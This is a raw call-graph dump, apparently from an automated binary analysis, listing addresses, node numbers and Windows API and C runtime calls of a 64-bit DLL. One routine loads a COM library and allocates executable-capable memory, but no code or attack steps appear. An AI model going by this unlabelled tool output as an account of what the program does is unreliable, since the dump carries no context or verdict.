17566->17573 17571 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17567->17571 17570 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17568->17570 17569->17568 17569->17573 17570->17573 17571->17573 17572->17573 17574->17560 18593 7fef9d376c0 18594 7fef9d376cf _CrtMemDumpAllObjectsSince 18593->18594 18595 7fef9d37be3 _CrtMemDumpAllObjectsSince 18593->18595 18597 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18594->18597 18598 7fef9d37905 _CrtMemDumpAllObjectsSince 18594->18598 18599 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18594->18599 18596 7fef9d37cc6 WideCharToMultiByte 18595->18596 18595->18597 18596->18597 18600 7fef9d23280 __GSHandlerCheck 8 API calls 18597->18600 18601 7fef9d3790f WideCharToMultiByte 18598->18601 18604 7fef9d37827 WideCharToMultiByte 18599->18604 18602 7fef9d37d85 18600->18602 18603 7fef9d37965 18601->18603 18603->18597 18605 7fef9d3799a GetLastError 18603->18605 18604->18597 18605->18597 18607 7fef9d379d3 _CrtMemDumpAllObjectsSince 18605->18607 18606 7fef9d37a05 WideCharToMultiByte 18606->18597 18606->18607 18607->18597 18607->18606 18059 7fef9d2f7f1 18060 7fef9d2f80d 18059->18060 18080 7fef9d2f8de _wcsftime_l 18059->18080 18116 7fef9d36fb0 18060->18116 18062 7fef9d2fa70 18123 7fef9d369c0 18062->18123 18064 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18067 7fef9d2f85a OutputDebugStringA 18064->18067 18066 7fef9d2f9f4 18066->18062 18069 7fef9d2d490 std::exception::_Copy_str 17 API calls 18066->18069 18070 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 18067->18070 18068 7fef9d2fa8a 18071 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18068->18071 18072 7fef9d2fa43 18069->18072 18076 7fef9d2f8ce 18070->18076 18074 7fef9d2fab7 18071->18074 18075 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18072->18075 18077 7fef9d2fb24 18074->18077 18078 7fef9d369c0 17 API calls 18074->18078 18092 7fef9d2fb6a 18074->18092 18075->18062 18085 7fef9d23280 __GSHandlerCheck 8 API calls 18076->18085 18079 7fef9d369c0 17 API calls 18077->18079 18081 7fef9d2faf7 18078->18081 18082 7fef9d2fb3d 18079->18082 18080->18066 18086 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18080->18086 18087 7fef9d2f996 18080->18087 18083 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18081->18083 18084 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18082->18084 18083->18077 18084->18092 18088 7fef9d3011d 18085->18088 18086->18087 18087->18066 18089 7fef9d2d490 std::exception::_Copy_str 17 API calls 18087->18089 18090 7fef9d2f9c7 18089->18090 18091 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18090->18091 18091->18066 18093 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18092->18093 18094 7fef9d2fc39 18092->18094 18093->18094 18095 7fef9d2fc97 18094->18095 18096 7fef9d2d490 std::exception::_Copy_str 17 API calls 18094->18096 18136 7fef9d36970 18095->18136 18097 7fef9d2fc6a 18096->18097 18099 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18097->18099 18099->18095 18101 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18102 7fef9d2fd6e 18101->18102 18103 7fef9d2fdbb 18102->18103 18104 7fef9d31640 17 API calls 18102->18104 18106 7fef9d2ff03 std::exception::_Copy_str 18103->18106 18139 7fef9d29360 LeaveCriticalSection 18103->18139 18105 7fef9d2fd8e 18104->18105 18107 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18105->18107 18106->18076 18108 7fef9d2ffef 18106->18108 18112 7fef9d2ffaa WriteFile 18106->18112 18107->18103 18109 7fef9d30008 OutputDebugStringA 18108->18109 18110 7fef9d30016 18108->18110 18109->18110 18110->18076 18113 7fef9d36fb0 _itow_s 17 API calls 18110->18113 18112->18108 18114 7fef9d30065 18113->18114 18115 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18114->18115 18115->18076 18117 7fef9d37003 18116->18117 18118 7fef9d36fd6 18116->18118 18120 7fef9d37030 _itow_s 17 API calls 18117->18120 18118->18117 18119 7fef9d36fdd 18118->18119 18140 7fef9d37030 18119->18140 18122 7fef9d2f82d 18120->18122 18122->18064 18124 7fef9d369e1 18123->18124 18125 7fef9d36a42 18124->18125 18127 7fef9d36a80 _calloc_dbg_impl 18124->18127 18126 7fef9d2bd70 _invalid_parameter 17 API calls 18125->18126 18132 7fef9d36a76 _calloc_dbg_impl 18126->18132 18128 7fef9d36b6e 18127->18128 18129 7fef9d36bac _calloc_dbg_impl 18127->18129 18130 7fef9d2bd70 _invalid_parameter 17 API calls 18128->18130 18131 7fef9d36ce8 18129->18131 18134 7fef9d36d26 _calloc_dbg_impl 18129->18134 18130->18132 18133 7fef9d2bd70 _invalid_parameter 17 API calls 18131->18133 18132->18068 18133->18132 18134->18132 18135 7fef9d2bd70 _invalid_parameter 17 API calls 18134->18135 18135->18132 18156 7fef9d363e0 18136->18156 18138 7fef9d2fd20 18138->18101 18139->18106 18141 7fef9d37055 18140->18141 18142 7fef9d370ab 18141->18142 18143 7fef9d370e9 18141->18143 18144 7fef9d2bd70 _invalid_parameter 17 API calls 18142->18144 18145 7fef9d3714a 18143->18145 18148 7fef9d37188 _calloc_dbg_impl 18143->18148 18153 7fef9d370df 18144->18153 18146 7fef9d2bd70 _invalid_parameter 17 API calls 18145->18146 18146->18153 18147 7fef9d37287 18149 7fef9d2bd70 _invalid_parameter 17 API calls 18147->18149 18148->18147 18151 7fef9d372c5 18148->18151 18149->18153 18150 7fef9d37338 18152 7fef9d2bd70 _invalid_parameter 17 API calls 18150->18152 18151->18150 18154 7fef9d37376 18151->18154 18152->18153 18153->18122 18154->18153 18155 7fef9d2bd70 _invalid_parameter 17 API calls 18154->18155 18155->18153 18157 7fef9d3640e 18156->18157 18158 7fef9d3648e 18157->18158 18160 7fef9d364cc _calloc_dbg_impl 18157->18160 18159 7fef9d2bd70 _invalid_parameter 17 API calls 18158->18159 18166 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 18159->18166 18161 7fef9d3668e _CrtMemDumpAllObjectsSince 18160->18161 18162 7fef9d3663f 18160->18162 18168 7fef9d35ea0 18161->18168 18163 7fef9d2bd70 _invalid_parameter 17 API calls 18162->18163 18163->18166 18165 7fef9d366b5 _calloc_dbg_impl 18165->18166 18167 7fef9d2bd70 _invalid_parameter 17 API calls 18165->18167 18166->18138 18167->18166 18169 7fef9d35ecf 18168->18169 18170 7fef9d35fae 18169->18170 18171 7fef9d35f6e 18169->18171 18178 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 18169->18178 18173 7fef9d35fcf _CrtMemDumpAllObjectsSince 18170->18173 18174 7fef9d362e1 _CrtMemDumpAllObjectsSince 18170->18174 18172 7fef9d2bd70 _invalid_parameter 17 API calls 18171->18172 18172->18178 18176 7fef9d360a1 MultiByteToWideChar 18173->18176 18173->18178 18175 7fef9d3632f MultiByteToWideChar 18174->18175 18174->18178 18175->18178 18177 7fef9d3610e GetLastError 18176->18177 18176->18178 18177->18178 18180 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 18177->18180 18178->18165 18179 7fef9d36238 MultiByteToWideChar 18179->18178 18180->18178 18180->18179 16474 7fef9d26ff2 16475 7fef9d26ffe 16474->16475 16478 7fef9d2ca00 16475->16478 16477 7fef9d27011 _initterm_e 16479 7fef9d2ca0e 16478->16479 16480 7fef9d2ca23 EncodePointer 16479->16480 16481 7fef9d2ca4b 16479->16481 16480->16479 16481->16477 18650 7fef9d3e2fc 18651 7fef9d3e309 get_int64_arg _get_printf_count_output 18650->18651 18652 7fef9d3e38c 18651->18652 18654 7fef9d3e3e1 18651->18654 18658 7fef9d2bd70 _invalid_parameter 17 API calls 18652->18658 18653 7fef9d3da75 18667 7fef9d3eca1 18653->18667 18671 7fef9d3dbb5 18653->18671 18654->18653 18655 7fef9d3eadf 18654->18655 18656 7fef9d3eec0 25 API calls 18654->18656 18657 7fef9d3ef10 25 API calls 18655->18657 18656->18655 18659 7fef9d3eafd 18657->18659 18670 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18658->18670 18660 7fef9d3eb33 18659->18660 18662 7fef9d3eec0 25 API calls 18659->18662 18661 7fef9d3ec29 18660->18661 18674 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18660->18674 18663 7fef9d3ebda 18661->18663 18664 7fef9d3ef10 25 API calls 18661->18664 18662->18660 18663->18653 18669 7fef9d3eec0 25 API calls 18663->18669 18664->18663 18665 7fef9d23280 __GSHandlerCheck 8 API calls 18666 7fef9d3ed9e 18665->18666 18668 7fef9d2bd70 _invalid_parameter 17 API calls 18667->18668 18667->18670 18668->18670 18669->18653 18670->18665 18673 7fef9d2bd70 _invalid_parameter 17 API calls 18671->18673 18672 7fef9d3f000 wcsxfrm 2 API calls 18672->18674 18673->18670 18674->18663 18674->18672 18675 7fef9d3ee40 25 API calls 18674->18675 18675->18674 18181 7fef9d253fb 18182 7fef9d2541d _realloc_dbg 18181->18182 18184 7fef9d25421 18182->18184 18187 7fef9d26380 18182->18187 18185 7fef9d254de _calloc_dbg_impl _realloc_dbg 18186 7fef9d2c020 _free_base 2 API calls 18185->18186 18186->18184 18188 7fef9d26395 _CrtIsValidPointer 18187->18188 18189 7fef9d26391 18187->18189 18188->18189 18190 7fef9d263b6 HeapValidate 18188->18190 18189->18185 18190->18189 16507 7fef9d235e1 16508 7fef9d235f1 16507->16508 16512 7fef9d235ea 16507->16512 16508->16512 16513 7fef9d212b0 16508->16513 16511 7fef9d212b0 14 API calls 16511->16512 16514 7fef9d212de CoLoadLibrary 16513->16514 16515 7fef9d22f8c 16513->16515 16517 7fef9d22f0f MessageBoxA ExitProcess 16514->16517 16518 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16514->16518 16516 7fef9d23280 __GSHandlerCheck 8 API calls 16515->16516 16519 7fef9d230ff 16516->16519 16518->16515 16520 7fef9d22f73 _calloc_dbg_impl 16518->16520 16519->16511 16519->16512 16521 7fef9d22f83 CoTaskMemFree 16520->16521 16521->16515 18191 7fef9d23fe1 18192 7fef9d23fea SetLastError 18191->18192 16522 7fef9d27de0 16523 7fef9d27ded 16522->16523 16527 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16522->16527 16529 7fef9d2aa40 16523->16529 16525 7fef9d27e0e 16527->16525 16533 7fef9d2d490 16527->16533 16543 7fef9d27ff0 16527->16543 16530 7fef9d2aa57 16529->16530 16531 7fef9d2aa4d 16529->16531 16530->16527 16547 7fef9d29c10 16531->16547 16535 7fef9d2d4b1 16533->16535 16534 7fef9d2d512 16536 7fef9d2bd70 _invalid_parameter 17 API calls 16534->16536 16535->16534 16539 7fef9d2d550 _calloc_dbg_impl 16535->16539 16538 7fef9d2d546 _calloc_dbg_impl 16536->16538 16537 7fef9d2d63e 16541 7fef9d2bd70 _invalid_parameter 17 API calls 16537->16541 16538->16527 16539->16537 16540 7fef9d2d67c _calloc_dbg_impl 16539->16540 16540->16538 16542 7fef9d2bd70 _invalid_parameter 17 API calls 16540->16542 16541->16538 16542->16538 16544 7fef9d28010 16543->16544 16545 7fef9d2800e 16543->16545 16546 7fef9d2be00 _invalid_parameter 16 API calls 16544->16546 16545->16527 16546->16545 16548 7fef9d29c2a 16547->16548 16557 7fef9d29b10 16548->16557 16550 7fef9d29c34 16561 7fef9d29f20 16550->16561 16552 7fef9d29c51 16554 7fef9d29ecd 16552->16554 16567 7fef9d2a000 16552->16567 16554->16530 16555 7fef9d29ce8 16555->16554 16580 7fef9d29360 LeaveCriticalSection 16555->16580 16558 7fef9d29b19 16557->16558 16559 7fef9d29bde 16558->16559 16581 7fef9d29360 LeaveCriticalSection 16558->16581 16559->16550 16562 7fef9d29f49 16561->16562 16563 7fef9d29f81 16562->16563 16564 7fef9d29f5b GetOEMCP 16562->16564 16565 7fef9d29f88 GetACP 16563->16565 16566 7fef9d29f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16563->16566 16564->16566 16565->16566 16566->16552 16568 7fef9d29f20 __initmbctable 2 API calls 16567->16568 16569 7fef9d2a028 16568->16569 16570 7fef9d2a234 16569->16570 16571 7fef9d2a08e __initmbctable 16569->16571 16576 7fef9d2a039 __initmbctable 16569->16576 16574 7fef9d2a25d IsValidCodePage 16570->16574 16570->16576 16582 7fef9d2a5e0 GetCPInfo 16571->16582 16572 7fef9d23280 __GSHandlerCheck 8 API calls 16573 7fef9d2a470 16572->16573 16573->16555 16575 7fef9d2a27b GetCPInfo 16574->16575 16574->16576 16575->16576 16579 7fef9d2a295 __initmbctable 16575->16579 16576->16572 16578 7fef9d2a5e0 __initmbctable 19 API calls 16578->16576 16579->16578 16580->16554 16581->16559 16585 7fef9d2a61f 16582->16585 16591 7fef9d2a7dc 16582->16591 16583 7fef9d23280 __GSHandlerCheck 8 API calls 16584 7fef9d2aa30 16583->16584 16584->16576 16586 7fef9d2f4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16585->16586 16587 7fef9d2a734 16586->16587 16593 7fef9d2ef00 16587->16593 16589 7fef9d2a788 16590 7fef9d2ef00 __initmbctable 7 API calls 16589->16590 16590->16591 16591->16583 16592 7fef9d2a80a 16591->16592 16592->16576 16594 7fef9d2ef2c _CrtMemDumpAllObjectsSince 16593->16594 16597 7fef9d2efb0 16594->16597 16596 7fef9d2ef8e _LocaleUpdate::~_LocaleUpdate 16596->16589 16598 7fef9d2efd4 __initmbctable 16597->16598 16599 7fef9d2f068 MultiByteToWideChar 16598->16599 16600 7fef9d2f0a5 _CrtMemDumpAllObjectsSince_stat 16599->16600 16604 7fef9d2f0ac malloc _MarkAllocaS 16599->16604 16600->16596 16601 7fef9d2f122 MultiByteToWideChar 16601->16600 16602 7fef9d2f164 LCMapStringW 16601->16602 16602->16600 16603 7fef9d2f1a8 16602->16603 16605 7fef9d2f1b8 16603->16605 16611 7fef9d2f222 malloc _MarkAllocaS 16603->16611 16604->16600 16604->16601 16605->16600 16606 7fef9d2f1d9 LCMapStringW 16605->16606 16606->16600 16607 7fef9d2f2ac LCMapStringW 16607->16600 16608 7fef9d2f2ea 16607->16608 16609 7fef9d2f341 WideCharToMultiByte 16608->16609 16610 7fef9d2f2f4 WideCharToMultiByte 16608->16610 16609->16600 16610->16600 16611->16600 16611->16607 18687 7fef9d312e3 LoadLibraryW 18688 7fef9d31304 GetProcAddress 18687->18688 18689 7fef9d312fd 18687->18689 18688->18689 18690 7fef9d3132a 7 API calls 18688->18690 18691 7fef9d23280 __GSHandlerCheck 8 API calls 18689->18691 18692 7fef9d313b3 GetProcAddress EncodePointer 18690->18692 18693 7fef9d313d5 18690->18693 18694 7fef9d3157a 18691->18694 18692->18693 18695 7fef9d313f9 DecodePointer DecodePointer 18693->18695 18697 7fef9d31428 DecodePointer 18693->18697 18695->18697 18697->18689 17592 7fef9d344e5 17596 7fef9d3445a __SehTransFilter 17592->17596 17593 7fef9d347d7 17594 7fef9d3485b 17593->17594 17595 7fef9d2cf80 _inconsistency 36 API calls 17593->17595 17595->17594 17597 7fef9d3466c __SehTransFilter 17596->17597 17604 7fef9d35180 17596->17604 17597->17593 17611 7fef9d35bb0 17597->17611 17600 7fef9d34727 17600->17593 17601 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17600->17601 17602 7fef9d34767 17601->17602 17617 7fef9d2edc0 RtlUnwindEx 17602->17617 17605 7fef9d2e500 __SetUnwindTryBlock 37 API calls 17604->17605 17606 7fef9d351c1 17605->17606 17607 7fef9d351f0 __SehTransFilter 17606->17607 17620 7fef9d35970 17606->17620 17609 7fef9d2edc0 __SehTransFilter 9 API calls 17607->17609 17610 7fef9d35259 17609->17610 17610->17596 17612 7fef9d35bc6 17611->17612 17613 7fef9d35bc8 17611->17613 17615 7fef9d2cf50 terminate 35 API calls 17612->17615 17616 7fef9d35bda __SehTransFilter 17612->17616 17614 7fef9d2cf80 _inconsistency 36 API calls 17613->17614 17614->17612 17615->17616 17616->17600 17618 7fef9d23280 __GSHandlerCheck 8 API calls 17617->17618 17619 7fef9d2eee7 17618->17619 17619->17593 17621 7fef9d35998 17620->17621 17624 7fef9d355f0 17621->17624 17623 7fef9d359d3 __SehTransFilter __AdjustPointer 17623->17607 17625 7fef9d3561e __SehTransFilter 17624->17625 17626 7fef9d35765 17625->17626 17627 7fef9d356fa _ValidateRead 17625->17627 17635 7fef9d356aa __SehTransFilter __AdjustPointer 17625->17635 17629 7fef9d3577a _ValidateRead 17626->17629 17630 7fef9d35813 __SehTransFilter 17626->17630 17628 7fef9d2cf80 _inconsistency 36 API calls 17627->17628 17627->17635 17628->17635 17631 7fef9d2cf80 _inconsistency 36 API calls 17629->17631 17629->17635 17632 7fef9d3584d _ValidateRead 17630->17632 17636 7fef9d358c6 __SehTransFilter _ValidateExecute _ValidateRead 17630->17636 17631->17635 17633 7fef9d2cf80 _inconsistency 36 API calls 17632->17633 17632->17635 17633->17635 17634 7fef9d2cf80 _inconsistency 36 API calls 17634->17635 17635->17623 17636->17634 17636->17635 18193 7fef9d3bfde 18202 7fef9d3c00c 18193->18202 18194 7fef9d3b99c 18195 7fef9d3cc93 18194->18195 18200 7fef9d3bada 18194->18200 18196 7fef9d2bd70 _invalid_parameter 17 API calls 18195->18196 18199 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18195->18199 18196->18199 18197 7fef9d3b530 wctomb_s 19 API calls 18197->18202 18198 7fef9d23280 __GSHandlerCheck 8 API calls 18201 7fef9d3cd90 18198->18201 18199->18198 18203 7fef9d2bd70 _invalid_parameter 17 API calls 18200->18203 18202->18194 18202->18197 18203->18199 17029 7fef9d35de0 17034 7fef9d23170 17029->17034 17031 7fef9d35e86 17035 7fef9d231ac 17034->17035 17036 7fef9d23280 __GSHandlerCheck 8 API calls 17035->17036 17037 7fef9d23263 17036->17037 17037->17031 17038 7fef9d23870 17037->17038 17039 7fef9d239db __SehTransFilter 17038->17039 17040 7fef9d238de __SehTransFilter 17038->17040 17039->17031 17040->17039 17041 7fef9d23a71 RtlUnwindEx 17040->17041 17041->17039 17042 7fef9d3ade0 17047 7fef9d3fee0 17042->17047 17045 7fef9d3adf9 17057 7fef9d3ff00 17047->17057 17049 7fef9d3ade9 17049->17045 17050 7fef9d3fc70 17049->17050 17056 7fef9d3fc86 17050->17056 17051 7fef9d3fd59 17128 7fef9d29360 LeaveCriticalSection 17051->17128 17053 7fef9d3fd63 17053->17045 17055 7fef9d3fd09 DeleteCriticalSection 17055->17056 17056->17051 17056->17055 17117 7fef9d40580 17056->17117 17058 7fef9d3ff22 17057->17058 17059 7fef9d40042 17058->17059 17060 7fef9d3ff47 17058->17060 17090 7fef9d29360 LeaveCriticalSection 17059->17090 17061 7fef9d4003d 17060->17061 17072 7fef9d3ae90 17060->17072 17061->17049 17063 7fef9d4004c 17063->17049 17065 7fef9d3ff97 17066 7fef9d3ffd0 17065->17066 17068 7fef9d3ffe1 17065->17068 17069 7fef9d3ffbb 17065->17069 17085 7fef9d3af60 17066->17085 17068->17066 17071 7fef9d3fd70 _fflush_nolock 25 API calls 17068->17071 17075 7fef9d3fd70 17069->17075 17071->17066 17073 7fef9d3aec8 EnterCriticalSection 17072->17073 17074 7fef9d3aea4 17072->17074 17073->17074 17074->17065 17076 7fef9d3fd81 17075->17076 17077 7fef9d3fd8a 17075->17077 17078 7fef9d3ff00 _fflush_nolock 25 API calls 17076->17078 17091 7fef9d3fdf0 17077->17091 17084 7fef9d3fd88 17078->17084 17080 7fef9d3fd94 17080->17084 17095 7fef9d3afb0 17080->17095 17084->17066 17086 7fef9d3af74 17085->17086 17087 7fef9d3af98 LeaveCriticalSection 17085->17087 17116 7fef9d29360 LeaveCriticalSection 17086->17116 17088 7fef9d3af96 17087->17088 17088->17061 17090->17063 17092 7fef9d3fe1f 17091->17092 17094 7fef9d3fe5d 17091->17094 17093 7fef9d3afb0 _fflush_nolock 17 API calls 17092->17093 17092->17094 17093->17094 17094->17080 17097 7fef9d3afc1 17095->17097 17096 7fef9d3b04b 17099 7fef9d407c0 17096->17099 17097->17096 17098 7fef9d2bd70 _invalid_parameter 17 API calls 17097->17098 17098->17096 17100 7fef9d407d3 17099->17100 17101 7fef9d407e8 17099->17101 17100->17084 17102 7fef9d40851 17101->17102 17108 7fef9d4088f 17101->17108 17103 7fef9d2bd70 _invalid_parameter 17 API calls 17102->17103 17103->17100 17104 7fef9d40913 17109 7fef9d2bd70 _invalid_parameter 17 API calls 17104->17109 17105 7fef9d40951 17106 7fef9d3fae0 _fflush_nolock 3 API calls 17105->17106 17107 7fef9d4095a 17106->17107 17110 7fef9d3f900 _fflush_nolock 17 API calls 17107->17110 17114 7fef9d409ab __doserrno 17107->17114 17108->17104 17108->17105 17109->17100 17111 7fef9d40992 FlushFileBuffers 17110->17111 17112 7fef9d4099f GetLastError 17111->17112 17111->17114 17112->17114 17115 7fef9d3fbc0 LeaveCriticalSection 17114->17115 17115->17100 17116->17088 17118 7fef9d40599 17117->17118 17119 7fef9d405ef 17118->17119 17120 7fef9d4062a 17118->17120 17123 7fef9d2bd70 _invalid_parameter 17 API calls 17119->17123 17125 7fef9d40623 17120->17125 17129 7fef9d3ae10 17120->17129 17122 7fef9d40651 17133 7fef9d40680 17122->17133 17123->17125 17125->17056 17126 7fef9d4065c 17144 7fef9d3aee0 17126->17144 17128->17053 17130 7fef9d3ae77 EnterCriticalSection 17129->17130 17131 7fef9d3ae27 17129->17131 17132 7fef9d3ae3b 17130->17132 17131->17130 17131->17132 17132->17122 17134 7fef9d40699 17133->17134 17135 7fef9d406ef 17134->17135 17136 7fef9d4072d 17134->17136 17140 7fef9d2bd70 _invalid_parameter 17 API calls 17135->17140 17137 7fef9d40723 17136->17137 17138 7fef9d3fdf0 _fflush_nolock 17 API calls 17136->17138 17137->17126 17139 7fef9d40752 17138->17139 17141 7fef9d3afb0 _fflush_nolock 17 API calls 17139->17141 17140->17137 17142 7fef9d4076a 17141->17142 17150 7fef9d40a20 17142->17150 17145 7fef9d3af47 LeaveCriticalSection 17144->17145 17146 7fef9d3aef7 17144->17146 17148 7fef9d3af45 17145->17148 17146->17145 17147 7fef9d3af0b 17146->17147 17186 7fef9d29360 LeaveCriticalSection 17147->17186 17148->17125 17151 7fef9d40a53 17150->17151 17157 7fef9d40a33 __doserrno 17150->17157 17152 7fef9d40b05 17151->17152 17153 7fef9d40abc __doserrno 17151->17153 17154 7fef9d40bd2 17152->17154 17159 7fef9d40b89 __doserrno 17152->17159 17156 7fef9d2bd70 _invalid_parameter 17 API calls 17153->17156 17155 7fef9d3fae0 _fflush_nolock 3 API calls 17154->17155 17158 7fef9d40bdb 17155->17158 17156->17157 17157->17137 17162 7fef9d40c13 17158->17162 17164 7fef9d40c80 17158->17164 17161 7fef9d2bd70 _invalid_parameter 17 API calls 17159->17161 17161->17157 17177 7fef9d3fbc0 LeaveCriticalSection 17162->17177 17165 7fef9d3f900 _fflush_nolock 17 API calls 17164->17165 17168 7fef9d40c91 17165->17168 17166 7fef9d40d05 17178 7fef9d3f7d0 17166->17178 17168->17166 17169 7fef9d40ce5 17168->17169 17170 7fef9d3f900 _fflush_nolock 17 API calls 17168->17170 17169->17166 17171 7fef9d3f900 _fflush_nolock 17 API calls 17169->17171 17172 7fef9d40cd6 17170->17172 17173 7fef9d40cf8 CloseHandle 17171->17173 17174 7fef9d3f900 _fflush_nolock 17 API calls 17172->17174 17173->17166 17175 7fef9d40d0f GetLastError 17173->17175 17174->17169 17175->17166 17176 7fef9d40d22 _dosmaperr 17176->17162 17177->17157 17179 7fef9d3f7e3 17178->17179 17180 7fef9d3f878 __doserrno 17178->17180 17179->17180 17181 7fef9d3f87a SetStdHandle 17179->17181 17182 7fef9d3f86a 17179->17182 17180->17176 17181->17180 17183 7fef9d3f871 17182->17183 17184 7fef9d3f889 SetStdHandle 17182->17184 17183->17180 17185 7fef9d3f898 SetStdHandle 17183->17185 17184->17180 17185->17180 17186->17148 17637 7fef9d348e0 17638 7fef9d348f7 std::bad_exception::~bad_exception 17637->17638 17639 7fef9d3490c 17638->17639 17641 7fef9d3d710 17638->17641 17642 7fef9d3d721 17641->17642 17643 7fef9d3d726 17641->17643 17642->17639 17645 7fef9d29360 LeaveCriticalSection 17643->17645 17645->17642 18725 7fef9d27ae3 18728 7fef9d27af3 18725->18728 18726 7fef9d27ce0 SetHandleCount 18727 7fef9d27c74 18726->18727 18728->18726 18729 7fef9d27b95 GetStdHandle 18728->18729 18730 7fef9d27c7b 18728->18730 18729->18730 18731 7fef9d27bb9 18729->18731 18730->18726 18731->18730 18732 7fef9d27bc8 GetFileType 18731->18732 18732->18730 18733 7fef9d27beb InitializeCriticalSectionAndSpinCount 18732->18733 18733->18727 18733->18730 17646 7fef9d314e1 17647 7fef9d314ef DecodePointer 17646->17647 17648 7fef9d31520 DecodePointer 17646->17648 17647->17648 17649 7fef9d3150f 17647->17649 17650 7fef9d31540 17648->17650 17649->17648 17651 7fef9d23280 __GSHandlerCheck 8 API calls 17650->17651 17652 7fef9d3157a 17651->17652 18210 7fef9d2a7e9 18211 7fef9d2a7f9 18210->18211 18212 7fef9d23280 __GSHandlerCheck 8 API calls 18211->18212 18213 7fef9d2a80a 18211->18213 18214 7fef9d2aa30 18212->18214 18215 7fef9d2c7e9 18216 7fef9d2c90c EncodePointer EncodePointer 18215->18216 18218 7fef9d2c80d 18215->18218 18217 7fef9d2c8ca 18216->18217 18221 7fef9d2c872 18218->18221 18224 7fef9d24a00 18218->18224 18220 7fef9d24a00 _realloc_dbg 30 API calls 18222 7fef9d2c8bd 18220->18222 18221->18217 18221->18220 18223 7fef9d2c8ce EncodePointer 18221->18223 18222->18217 18222->18223 18223->18216 18225 7fef9d24a22 18224->18225 18230 7fef9d24a70 18225->18230 18227 7fef9d24a4c 18241 7fef9d29360 LeaveCriticalSection 18227->18241 18229 7fef9d24a5b 18229->18221 18232 7fef9d24ad4 _realloc_dbg 18230->18232 18233 7fef9d24aae _calloc_dbg_impl 18230->18233 18231 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18238 7fef9d24e2c 18231->18238 18232->18231 18232->18233 18233->18227 18234 7fef9d24f90 18257 7fef9d2ba60 18234->18257 18235 7fef9d24f64 18242 7fef9d2bc30 18235->18242 18238->18233 18238->18234 18238->18235 18239 7fef9d24fa6 18239->18233 18240 7fef9d24fba HeapSize 18239->18240 18240->18233 18241->18229 18243 7fef9d2bc50 18242->18243 18244 7fef9d2bc5f 18242->18244 18268 7fef9d2abf0 18243->18268 18246 7fef9d2bc67 18244->18246 18248 7fef9d2bc78 18244->18248 18247 7fef9d2c020 _free_base 2 API calls 18246->18247 18252 7fef9d2bc5a _get_errno_from_oserr 18247->18252 18249 7fef9d2bcba 18248->18249 18250 7fef9d2bc9a HeapReAlloc 18248->18250 18253 7fef9d2bce4 18248->18253 18255 7fef9d2abb0 _callnewh DecodePointer 18248->18255 18256 7fef9d2bd1f GetLastError 18248->18256 18251 7fef9d2abb0 _callnewh DecodePointer 18249->18251 18250->18248 18251->18252 18252->18233 18253->18252 18254 7fef9d2bcee GetLastError 18253->18254 18254->18252 18255->18248 18256->18252 18258 7fef9d2ba76 18257->18258 18259 7fef9d2bacc 18258->18259 18260 7fef9d2bb07 18258->18260 18263 7fef9d2bd70 _invalid_parameter 17 API calls 18259->18263 18261 7fef9d2bb32 HeapSize HeapReAlloc 18260->18261 18265 7fef9d2bb00 _get_errno_from_oserr 18260->18265 18262 7fef9d2bb74 18261->18262 18261->18265 18264 7fef9d2bba0 GetLastError 18262->18264 18274 7fef9d2bbd0 HeapQueryInformation 18262->18274 18263->18265 18264->18265 18265->18239 18269 7fef9d2ac4d 18268->18269 18271 7fef9d2ac0a 18268->18271 18270 7fef9d2abb0 _callnewh DecodePointer 18269->18270 18272 7fef9d2ac21 18270->18272 18271->18272 18273 7fef9d2abb0 _callnewh DecodePointer 18271->18273 18272->18252 18273->18271 18275 7fef9d2bb90 18274->18275 18275->18264 18275->18265 18739 7fef9d39aeb 18740 7fef9d39b2c 18739->18740 18741 7fef9d39b18 18739->18741 18742 7fef9d3ab10 17 API calls 18740->18742 18743 7fef9d39520 19 API calls 18741->18743 18746 7fef9d39b38 18742->18746 18743->18740 18744 7fef9d39c04 18745 7fef9d3a1cb 18744->18745 18749 7fef9d39c23 GetConsoleCP 18744->18749 18747 7fef9d3a205 18745->18747 18748 7fef9d3a8ad WriteFile 18745->18748 18746->18744 18753 7fef9d39bae GetConsoleMode 18746->18753 18750 7fef9d3a400 18747->18750 18751 7fef9d3a21a 18747->18751 18752 7fef9d3a923 GetLastError 18748->18752 18772 7fef9d39dd9 _dosmaperr __doserrno 18748->18772 18775 7fef9d39c4d 18749->18775 18767 7fef9d3a40e 18750->18767 18773 7fef9d3a5f3 18750->18773 18754 7fef9d3a33e WriteFile 18751->18754 18751->18772 18752->18772 18753->18744 18754->18751 18758 7fef9d3a3ea GetLastError 18754->18758 18755 7fef9d23280 __GSHandlerCheck 8 API calls 18760 7fef9d3a9f5 18755->18760 18756 7fef9d39f66 WideCharToMultiByte 18761 7fef9d39fbf WriteFile 18756->18761 18756->18772 18757 7fef9d3a726 WideCharToMultiByte 18762 7fef9d3a791 GetLastError 18757->18762 18757->18773 18758->18772 18759 7fef9d3a531 WriteFile 18763 7fef9d3a5dd GetLastError 18759->18763 18759->18767 18764 7fef9d3a050 GetLastError 18761->18764 18761->18775 